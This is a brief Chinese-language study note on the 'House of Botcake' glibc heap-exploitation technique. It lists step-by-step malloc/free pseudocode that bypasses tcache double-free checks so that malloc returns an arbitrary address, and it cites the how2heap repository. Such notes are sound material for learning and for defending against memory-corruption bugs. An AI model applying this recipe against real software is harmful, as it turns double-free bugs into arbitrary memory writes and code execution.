House of Botcake
2.27中也可使用, 绕过tcache double free的检测.
- 利用结果: 使malloc返回任意地址
- 要求: 存在double free
利用方式
使用0x100 (chunk size: 0x110)来演示:
- listTrash = malloc(0x100) * 7
- prev = malloc(0x100)
- a = malloc(0x100) # the victim
- malloc (0x10) #padding
- free(listTrash[i]) for i in [0,7) # fill up tcachebin
- free(a) # free a; a in unsortedbin
- free(prev) # prev consolidate with a
- malloc(0x100); # get one chunk from tcache
- free(a) # free victim again, now it is also in tcachebin
- malloc(0x120) # 利用重叠申请到prev+victim合并产生的chunk
- 改写victim的fd
- malloc(0x100) # BOOM!
参考
https://github.com/shellphish/how2heap/blob/master/glibc_2.31/house_of_botcake.c